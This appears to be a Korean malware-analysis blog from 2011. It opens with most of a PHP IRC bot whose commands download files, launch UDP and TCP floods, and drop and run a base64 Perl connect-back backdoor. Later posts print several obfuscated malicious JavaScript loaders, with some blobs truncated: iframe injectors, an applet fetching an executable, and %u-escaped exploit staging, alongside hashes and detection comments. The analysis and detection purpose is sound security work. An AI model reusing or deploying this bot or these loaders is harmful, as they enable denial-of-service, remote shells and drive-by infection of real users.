                   case "download":                                if(count($mcmd) > 2)
                   {
                     if(!$fp = fopen($mcmd[2],"w"))
                     {
                       $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
                     }
                     else
                     {
                       if(!$get = file($mcmd[1]))
                       {
                         $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
                       }
                       else
                       {
                         for($i=0;$i<=count($get);
                         $i++)
                         {
                           fwrite($fp,$get[$i]);
                         }
                         $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
                       }
                       fclose($fp);
                     }
                   }
                   else
                   {
                     $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file");
                   }
                   break;
                   // Quit IRC and terminate the script.
                   case "mati":                                $this->send("QUIT :die command from $nick");
                   fclose($this->conn);
                   exit;
                   // Log the operator out.
                   case "keluar":                                $this->log_out($host);
                   $this->privmsg($this->config['chan'],"[\2auth\2]: $nick ekhuuuuuuuu!");
                   break;
                   // Denial-of-service primitives, see udpflood() / tcpflood() below.
                   case "fluud":                                if(count($mcmd)>3)
                   {
                     $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
                   }
                   break;
                   case "flood":                                if(count($mcmd)>5)
                   {
                     $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
                   }
                   break;
                 }
               }
             }
             break;
           }
         }
       }
       $old_buf = $this->buf;
     }
     $this->start();
   }
   // Write one raw IRC line (CRLF-terminated) to the C2 socket.
   function send($msg)
   {
     fwrite($this->conn,"$msg\r\n");
   }
   function join($chan,$key=NULL)
   {
     $this->send("JOIN $chan $key");
   }
   function privmsg($to,$msg)
   {
     $this->send("PRIVMSG $to :$msg");
   }
   function notice($to,$msg)
   {
     $this->send("NOTICE $to :$msg");
   }
   // 1 when the sender's host prefix has authenticated, else 0.
   function is_logged_in($host)
   {
     if(isset($this->users[$host]))        return 1;
     else        return 0;
   }
   function log_in($host)
   {
     $this->users[$host] = true;
   }
   function log_out($host)
   {
     unset($this->users[$host]);
   }
   // Choose and send a nick: a prefix derived from SERVER_SOFTWARE (only the
   // "I" for IIS survives in this paste; the other branches show empty strings,
   // possibly stripped characters), then the configured prefix, then maxrand
   // random digits. Nicks of the form <prefix><digits> are an IRC-side indicator.
   function set_nick()
   {
     if(isset($_SERVER['SERVER_SOFTWARE']))
     {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))           $this->nick = "";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))           $this->nick = "I";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))           $this->nick = "";
       else           $this->nick = "";
     }
     else
     {
       $this->nick = "";
     }
     $this->nick .= $this->config['prefix'];
     for($i=0;$i<$this->config['maxrand'];$i++)        $this->nick .= mt_rand(0,9);
     $this->send("NICK ".$this->nick);
   }
   // DoS primitive: builds a random payload of $packetsize bytes, then for $time
   // seconds repeatedly opens a UDP socket to a random port (0-6000) on $host and
   // writes the payload; reports the approximate MB sent and rate to the channel.
   // From the victim's side this is a burst of outbound UDP from the web server.
   function udpflood($host,$packetsize,$time)
   {
     $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)
     {
       $packet .= chr(mt_rand(1,256));
     }
     $timei = time();
     $i = 0;
     while(time()-$timei < $time)
     {
       $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
       fwrite($fp,$packet);
       fclose($fp);
       $i++;
     }
     $env = $i * $packetsize;
     $env = $env / 1048576;
     $vel = $env / $time;
     $vel = round($vel);
     $env = round($env);
     $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
   }
   // DoS primitive: sends $packets random payloads of $packetsize bytes over
   // fresh TCP connections to $host:$port, sleeping $delay seconds between them;
   // stops at the first connection error.
   function tcpflood($host,$packets,$packetsize,$port,$delay)
   {
     $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)        $packet .= chr(mt_rand(1,256));
     for($i=0;$i<$packets;$i++)
     {
       if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
       {
         $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
         return 0;
       }
       else
       {
         fwrite($fp,$packet);
         fclose($fp);
       }
       sleep($delay);
     }
     $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
   }
   // Reverse shell: drops a base64-embedded Perl script (its decoded header,
   // "Data Cha0s Connect Back Backdoor", is shown further down the page) to
   // /tmp, /var/tmp or the current directory, runs it in the background with
   // the operator-supplied ip:port, and deletes the file again. The blob is
   // truncated here ([생략]). Detection: a perl process whose parent is the web
   // server, a short-lived dc.pl in those directories, and an outbound
   // connection from the web server to an arbitrary host/port.
   function conback($ip,$port)
   {
     $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
     $dc_source = "
IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRh
dGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkd
WWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQo
gIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iO
w
[생략] PiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZW
lsqXSBEYXRhY2hlZFxuXG4iOw==";
     if (is_writable("/tmp"))
     {
       if (file_exists("/tmp/dc.pl"))
       {
         unlink("/tmp/dc.pl");
       }
       $fp=fopen("/tmp/dc.pl","w");
       fwrite($fp,base64_decode($dc_source));
       passthru("perl /tmp/dc.pl $ip $port &");
       unlink("/tmp/dc.pl");
     }
     else
     {
       if (is_writable("/var/tmp"))
       {
         if (file_exists("/var/tmp/dc.pl"))
         {
           unlink("/var/tmp/dc.pl");
         }
         $fp=fopen("/var/tmp/dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl /var/tmp/dc.pl $ip $port &");
         unlink("/var/tmp/dc.pl");
       }
       if (is_writable("."))
       {
         if (file_exists("dc.pl"))
         {
           unlink("dc.pl");
         }
         $fp=fopen("dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl dc.pl $ip $port &");
         unlink("dc.pl");
       }
     }
   }
 }
 // Instantiate and run. start() does not return normally (main() loops on the
 // socket and reconnects on EOF), so the PHP worker serving this request is
 // held for the bot's lifetime: a long-running request to the "image" URL is
 // itself a detection signal.
 $bot = new pBot;
 $bot->start();
 

#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}

일부 코드 생략 !!

}
print "[*] Datached\n\n";

Decode 결과물.zip


Decode : 바이러스토탈결과

* 결과물에는 암호가 설정 되어 있습니다.                                                (비밀댓글 주시면 암호 알려드리겠습니다.)



posted by Kwan's 2011. 12. 10. 02:36

 

File : CAA7EF2L ,CAA7EF2L.(숨김파일)
MD5 : 87514e109381faa98b50f426dd37f015  CAA7EF2L
MD5 : 87514e109381faa98b50f426dd37f015  CAA7EF2L. (숨김파일)
크기 :
88.6KB (90,752 바이트)
        88.6KB (90,752 바이트) (숨김파일)
감염 사이트 :
http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe
Kaspersky : HEUR:Trojan-Downloader.Win32.Generic

VirusTotal :

http://www.virustotal.com/file-scan/report.html?id=b8aed1eac332adada69d7725614442ec14bab7f30b7069f56a598698a030e2e8-1323448834


alyackorea.com 사이트 접속시 한 P2P 사이트로 넘어 갑니다 !




http://alyackorea.com/download.php?n=kakao_theme_2.X.0.exe 

해당 프로그램 다운로드시 !


이런 프로그램이 다운되어서 실행이 됩니다. 해당 파일을 실행시  WizPop , EASYON , FINETOP 등
프로그램이 실행 및 설치 됩니다.


 



삭제 방법은 울지않는 벌새 블로그

 :
검색 도우미 : 위즈팝(WizPop)
   http://hummingbird.tistory.com/2350 참고 하시면 될꺼 같습니다!

여기를 확인 하시면 도움이 될꺼라고 생각합니다!

파일명으로 판단하지마시고 다시한번 공식 사이트를 확인하셔서 한번 더 확인하고 받으면 안전할꺼라고 생각합니다.

공식 알약 사이트 : http://alyac.altools.co.kr/Main/Default.aspx


posted by Kwan's 2011. 12. 10. 01:04

File :

java.html
MD5 :  66a3a0be5fc181f1a9379a9a696c0928
크기 : 2.98KB (3,058 바이트)
감염 사이트 : http://78xxk.com/java.html
Kaspersky : Trojan-Downloader.JS.Agent.gm
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327

// Stage 3 of the decoder chain: treats each char code of `str` as one UTF-8
// byte and reassembles them into a normal (UTF-16) JS string.
// Lead nibbles 0-7 copy the byte as-is, 12/13 consume one continuation byte,
// 14 consumes two.  There is no `default:` case, so bytes with lead nibble
// 8-11 or 15 are silently dropped.
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
// Reverse base64 alphabet lookup table indexed by byte value; the table body
// is abridged in this listing (생략).  nbcode() below relies on -1 entries to
// mark non-alphabet characters.
var base64DecodeChars=new Array( 생략 );
// Stage 1 of the decoder chain: plain base64 decoding of `str`.
// Each of the four nested do/while loops skips characters whose table entry
// is -1 (non-alphabet), stops on end of input, and treats char code 61 ('=')
// as padding that ends the output early.  Output is a "binary" string with
// one byte per char code.
function nbcode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
// Converts an array of 32-bit words back into a byte string, least
// significant byte first (little-endian).  Mutates `v` in place.
// When `w` is truthy the last word is read (before the loop overwrites it) as
// the original byte length and the result is truncated to it.
// The word<->string wrappers here and in str2long() match the usual helpers
// around a block-TEA style cipher; the cipher body itself is abridged in
// nbshine() below, so treat that identification as unconfirmed.
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
// Inverse of long2str(): packs a byte string into 32-bit words, four chars
// per word, little-endian.  Char codes past the end of `s` come back as NaN,
// which the bitwise ops coerce to 0 (implicit zero padding).
// When `w` is truthy the byte length is appended as an extra trailing word.
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
// Stage 2 of the decoder chain: decrypts the base64-decoded blob with `key`.
// Most of the body is missing from this listing; the surviving tail
// (`v[0]=v[0]-mx`, `sum=sum-delta`) is consistent with the final round of a
// block-TEA style decryption, and the result is unpacked with the
// length-aware variant of long2str().  Empty input short-circuits to "".
function nbshine(str,key){if(str==""){return "";}
z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// Encrypted payload (base64 text, abridged here with 생략).
t="GhSI6ogoUBDNPP0jfVLuz4Hm6Ei+7aoM3CEe17FSeZKBW0L1ZllNuhB6
/ShcPzCYCLruc/생략/RlPelzXHnJN";
// Decode pipeline: base64 -> nbshine() with the hex-escaped key
// "123456789abcdef" (15 chars) -> UTF-8 to UTF-16.  The final call is
// document.write(t) with both property names spelled as \x escapes
// ("document", "write") to defeat naive string matching.  The decoded markup
// is therefore injected straight into the page at load time.
t=utf8to16(nbshine(nbcode(t), '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66'));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](t);

<!-- Applet loader markup (presumably what the decoded document.write above
     emits).  Indicators: a 1x1 applet whose archive is served under an image
     name ("apple.jpg"), a "data" param carrying the URL of a Windows
     executable (presumably fetched by the applet class), and a malformed
     value attribute that is missing its closing quote, as transcribed. -->
<html>
   <head></head>
   <body>
     <applet archive="apple.jpg" code="ScriptEngineExp.class"
width="1" height="1">
       <param name="data" value="http://208.53.158.1xx/9.exe>
     </applet>
  </body>
 </html>

apple.jpg (application/zip) ~> apple.zip


b8a1deb8ac5a7b0572a0601331d2ba4b  .classpath
e9a411939cd3ef76528685541ae69709  .project
5127569b4f83d8b42d9f2f20eecdc300  ScriptEngineExp.class
92d04d6bd8a0235843240bba30d2f091  MANIFEST.MF



posted by Kwan's 2011. 11. 19. 20:46

* 네이버 어느 페이지에서 감염되었는지는 모르겠다는걸 알려 드립니다!

최초 진단 사이트 : HEUR:Trojan.Script.Iframer (카스퍼스키)

링크 : http://n37.nsmartad.com/imp?slot=3451&ads=57314&tid=1&type=as

// Decoy output so the ad slot renders something harmless-looking.
document.write("OK");
// Iframe injector, gated two ways:
//   1. user agent must contain "windows nt 5.1" (Windows XP); `August>0`
//      rather than `>=0` works only because the substring is never at
//      offset 0 of a UA string
//   2. a `veatpr` cookie marks hosts already served, so the iframe is written
//      once per cookie lifetime
// The expiry is 24*60*30*1000 ms = 43,200,000 ms = 12 hours — likely a typo
// for 30 days (a 24*60*60*1000*30 factor), though that is a guess.
// The unescape()d string starts "%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70",
// i.e. `<iframe src=http`, and ends "%65%3E" = `e>`; the middle is abridged.
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70% 생 략 %65%3E"));}

OK
var info=navigator.userAgent.toLowerCase();var August=info.indexOf("windows nt 5.1");if(document.cookie.indexOf('veatpr')==-1&&August>0){var expires=new Date();expires.setTime(expires.getTime()+24*60*30*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();<iframe src= http://wap.helloshop.ixfx/a18/my.html ?cdkey width=25 height=0></iframe>}

my.html 하위 사이트 연결 !!


fun.htm?莖폭渡괩1119

HEX :
687474703A2F2F3132312E37382E3134372E3137352F4167732F4147532E676966

http://121.78.147.175/Ags/AGS.gXf ~> 최종파일

new.html?劤壙젬꺄1119


 var January="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+
 "<object width=\"550\" height=\"400\">\r\n"+
 "<param name=\"movie\" value=\"done.swf\">\r\n"+
 "<embed src=\" Birthday.swf \" width=\"550\" height=\"400\">\r\n"+
 "<\/embed>\r\n"+
 "<\/object>"


  1. 물여우 2011.11.19 22:32 신고  Addr  Edit/Del  Reply

    네이버 어딘지 찾기 정말 어렵네요.
    그나저나 휴가 때마다 분석이시라니 대단하십니다!!
    추운데 감기 조심하세요~ ^^

  2. milaero 2011.11.20 00:19 신고  Addr  Edit/Del  Reply

    진짜 시간날때마다 분석하시다니.. 수고하십니다 :)

posted by Kwan's 2011. 10. 22. 12:19

File :

f1.html
MD5 :  bce75d05869be9fdf489d13630bab1f1
크기 : 8.67KB (8,879 바이트)
감염 사이트 : http://toto888.gnway.net:8080/xxx/f1.html
Kaspersky : Exploit.JS.Agent.akr
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=f811ce7544059f8123fdf5199e2abb29e8f4508dc9b58a761185779d96de2c12-1319253379
 
원본 코드

// The standard base64 alphabet, split across several variables and
// concatenated at runtime so the literal "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef
// ghijklmnopqrstuvwxyz0123456789+/=" never appears in the file.
// '=' sits at index 64, which mydata() uses as the padding sentinel.
var a1 = "ABCDEFG";
var a2 = "HIJKLMNOP";
var a3 = "QRSTUVWXYZabcdef";
var keyStrs = a1+a2+a3+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";
// Plain base64 decoder built on keyStrs.indexOf(); the renamed function is the
// only "obfuscation".  Four input chars -> up to three output chars, with an
// index of 64 ('=') suppressing the second/third byte.
// Quirks worth noting when reproducing the decode:
//   - `base64test` is declared but never used (the replace() on the next line
//     uses a literal regex instead)
//   - `var chr1,chr2,chr3=""` initialises only chr3; same for enc4
//   - do/while runs at least once, so an empty input still emits one
//     String.fromCharCode(0), because keyStrs.indexOf("") is 0
//   - the `};` between the do-block and `while` is reproduced as transcribed;
//     strict parsers may reject it
function mydata(input){
 var output="";
 var chr1,chr2,chr3="";
 var enc1,enc2,enc3,enc4="";
 var i=0;
 var base64test=/[^A-Za-z0-9\+\/\=]/g;
 input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");
 do{
  enc1=keyStrs.indexOf(input.charAt(i++));
  enc2=keyStrs.indexOf(input.charAt(i++));
  enc3=keyStrs.indexOf(input.charAt(i++));
  enc4=keyStrs.indexOf(input.charAt(i++));
  chr1=(enc1<<2)|(enc2>>4);
  chr2=((enc2&15)<<4)|(enc3>>2);
  chr3=((enc3&3)<<6)|enc4;
  output=output+String.fromCharCode(chr1);
  if(enc3!=64){output=output+String.fromCharCode(chr2);};
  if(enc4!=64){output=output+String.fromCharCode(chr3);};
  chr1=chr2=chr3="";
  enc1=enc2=enc3=enc4="";
 };
 while(i<input.length);return output;
 };
// KT is a comma-separated list of small arithmetic expressions, each of which
// evaluates to one char code of a base64 string: 2000/25=80 'P', 3905/55=71
// 'G', 60-3=57 '9', 106-1=105 'i', 189-92=97 'a', 206-97=109 'm' ... ("PG9iam",
// which base64-decodes to "<objec").  The middle of the list is abridged.
KT="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";
// eval() first folds the arithmetic, String.fromCharCode() turns the codes
// into the base64 text, mydata() decodes it, and the resulting markup is
// written into the page.  Swapping mydata for alert() (as the author did) is
// a safe way to recover the intermediate base64 without executing it.
t=eval("mydata(String.fromCharCode("+KT+"))");
document.write(t);

Eval 함수 실행 후

mydata(String.fromCharCode(="2000 / 25 ,3905 / 55 ,60 - 3 ,106 - 1 ,189 - 92 ,206 - 97 ,31 + 55 ,19 + 87 ,1700 / 17 ,2211 / 33 ,117 - 51 ,114 - 8 ,44 + 54 ,39 + 32 ,52 + 18 ,173 - 51 ,96 + 3 ,85 - 35 ,137 - 29 ,4494 / 42 ,138 - 58 ,154 - 71 ,16 + 58 ,2438 / 23 ,6076 / 62 ,1368 / 19 ,14 + 64 ,224 - 112 ,28 + 62 ,6 + 62 ,9072 / 81 ,158 - 51 ,3003 / 39 ,193 - 87 ,8500 / 85 ,209 - 103 ,48 + 
[중간코드 생략] / 61 ,2670 / 30 ,7482 / 86 ,186 - 78 ,10296 / 88 ,5183 / 71 ,735 / 7 ,3510 / 54 ,4366 / 37 ,18 + 62 ,171 - 68 ,1632 / 34 ,88 - 13 ,131 - 51 ,91 - 24 ,3078 / 54 ,6726 / 57 ,153 - 64 ,57 + 52 ,94 + 18 ,126 - 18 ,96 - 7 ,96 - 45 ,405 / 5 ,65 - 22 ";)


mydata ~> Alert 변경후 실행 !

---------------------------
Microsoft Internet Explorer
---------------------------
PG9iamVjdCBjbGFzc2lkPSJjbHNpZDpkMjdjZGI2ZS1hZTZkLTExY2YtOTZiO
C00NDQ1NTM1NDAwMDAiIA0Kd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMDAiIGlkP
SJ0ZXN0IiBhbGlnbj0ibWlkZGxlIj4NCjxwYXJhbSBuYW1lPSJtb3ZpZSIgdmFs
[중간코드 생략]bHVlPSJ0cnVlIiAvPg0KPHBhcmFtIG5hbWU9ImRldmljZWZvbnQiIHZhbHVlPSJ
mYWxzZSIgLz4NCjxwYXJhbSBuYW1lPSJzYWxpZ24iIHZhbHVlPSIiIC8+DQo8
cGFyYW0gbmFtZT0iYWxsb3dTY3JpcHRBY2Nlc3MiIHZhbHVlPSJzYW1lRG9tY
WluIiAvPg0KPC9vYmplY3Q+
---------------------------
확인  
---------------------------


Decode Base 64

<!-- Decoded output of the f1.html script: a 200x100 Flash <object>
     (classid d27cdb6e-ae6d-11cf-96b8-444553540000 is the Shockwave Flash
     ActiveX control) loading "happ.swf" with an `info=` query parameter.
     allowScriptAccess="sameDomain" lets the SWF script the hosting page from
     the same origin.  Everything else is stock Flash embed boilerplate. -->
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
width="200" height="100" id="test" align="middle">
<param name="movie" value="happ.swf?
info=02E631B5B1353336AB51D3527B7A6FAE7986" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="play" value="true" />
<param name="loop" value="true" />
<param name="wmode" value="window" />
<param name="scale" value="showall" />
<param name="menu" value="true" />
<param name="devicefont" value="false" />
<param name="salign" value="" />
<param name="allowScriptAccess" value="sameDomain" />
</object>


posted by Kwan's 2011. 9. 23. 13:01

File :

rst46815.htm
MD5 :  52060d2944fa64d564f0ac4dfbd83c56
크기 : 3.71KB (3,806 바이트)
감염 사이트 : http://bydbest.com/xxx/rst46815.htm
Kaspersky : Trojan-Downloader.JS.Iframe.ciq
 
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" " 생략 ">
 <html xmlns=" 생략 ">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
 <title>Untitled Document</title>
 </head>
 <body><a href=" 생략 " target="_blank">Free dating, Friendship, sms</a>
 </body>
 
<!-- Obfuscated loader appended after </body>.  Two tricks are used:
     (1) `o = d1 - d2` where d2 is d1 + 2 ms, so `o` is always -2 and every
         `N+o` term is the real char code plus two (11+o = 9 tab, 107+o = 105
         'i', 104+o = 102 'f', 34+o = 32 ' ', 42+o = 40 '(' ... "if (document");
     (2) eval is reached as window[textNode.nodeValue] with the name split into
         "ev"+"al", presumably to dodge signatures that look for `eval(`.
     The argument list is abridged in the middle. -->
<!-- . --><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("ev"+"al");
 e=window[aa.nodeValue];
 e(String.fromCharCode

(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,
118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,
68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,
123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,
99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,
103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,
(중간 코드 생략),11+o,102+o,113+o,101+o,119+o,111+o,103+o,
(중간 코드 생략),11+o,11+o,127+o));
 
</script><!-- . --> </html>
 

[Script 해독]

// Decoded form of the rst46815.htm script.  If a <body> element already
// exists the iframe is attached via DOM (iframer below); otherwise the same
// hidden iframe is document.write()n directly.  Either path loads
// in.cgi?default from the redirector host.  The string literal below is
// wrapped across lines as transcribed; in the original it is one line.
if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://neotraff.xx.xx/in.cgi?default' width='10' height='10' style='visibilit
y:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Creates a 10x10 iframe that is invisible (visibility:hidden, absolutely
// positioned at 0,0) and appends it to <body>.  Detection hint: a hidden,
// absolutely positioned iframe of tiny size pointing at a /in.cgi?default
// URL is the signature of this loader.
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://neotraff.xx.xx/in.cgi?default');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}


[연결 되는 URL]

http://neotraff.xx.xx/in.cgi?default

[VirusTotal 결과]

http://www.virustotal.com/file-scan/report.html?id=025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c-1316749355

MD5   : 52060d2944fa64d564f0ac4dfbd83c56
SHA1  : 857d18e3000994379d82b632c7d25c2dedf9478d
SHA256: 025e13abacdf118eb22bf889fce543ce02e6a97c2d4753ca685d1fa00cd9246c


posted by Kwan's 2011. 7. 27. 18:38

제가 본 한 중국 사이트의 악성 스크립트 입니다 !

<script src='party.css'></script>

IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 !

party.css 볼까요

// Excerpt from party.css (served as JavaScript).  '\x25' is '%'; the
// variables assemble `%uXXXX` escape sequences one character at a time so the
// final string never appears literally:
//   jj='%u4B5B' kk='%uCD36' ll='%uBD8F' mm='%uE9D0' oo='%uFB7A'
//   kao='%uBDBC' shit='%uBDBD' cao='%uBDD7'
//   hua3='%u5', hua4='%u5858%u5858'
// `%uXXXX` is the form unescape() turns into 16-bit code units; building
// such strings piecewise is a common way to stage binary data in an exploit
// page.  The unescape call and the declaration of `oah` are not in this
// excerpt (the listing is abridged).
var hua, hua1, hua2, hua3, hua4;

hua='\x25';    var kao='\x25';   var shit='\x25'; var jj=hua+'u'+'4B5B';  var cao='\x25';
 hua1='u';     kao+='u';    shit+='u';  var kk=hua+'u'+'CD36';  cao+='u';
hua2='58';    kao+='B';    shit+='B';  var ll=hua+'u'+'BD8F';  cao+='B';
 hua3=hua+hua1+'5';    kao+='D';    shit+='D';  var mm=hua+'u'+'E9D0';  cao+='DD';
hua4=hua3+'8'+'58%'+hua1+hua2+hua2; kao+='BC';       shit+='B';shit+='D'; var oo=hua+'u'+'FB7A';  cao+='7';

 var org='u2355%uBDBF%'+'u';
oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';

[중간 코드 생략]

// Continuation of the `oah` buffer (plain `%u` escapes).
oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';

// Second buffer using the token "AHWM" as a stand-in for "%u"; as the author
// notes below, substituting it back yields a normal `%u` escape string that
// decodes to the final stage.  Body abridged.
var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

짧막하게 한번 코드를 간추려서 써보았습니다.

첫번째 빨간색으로 되어있는 코드는 그대로 따라가주면 됩니다 !
여기서
\x25' 는 %25로서 % 을 의미 합니다.

두번째는 var org 로서 되어있는 코드를 모아 봅니다!
이번 스트립트는... var org1 부터 var org12 까지 모아져 있습니다.

그걸 전부 합치면 최종 코드가 짜잔 나옵니다....
이런건 노가다기 때문에 패쓰 합니다...

마지막 코드는

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막이 역시 제일 중요합니다.
최종 파일을 쉽게 나오게 할 수 있는 힌트 입니다.

var oaho='ADB7AHWM3Dbd3AHWM8d92AHWM[중간코드 생략]8c8fAHWMde93AHWMceceAHWMbdbd';

마지막인 코드를 들여다 보면 곧바로 최종파일 바로 받을 수 있습니다.

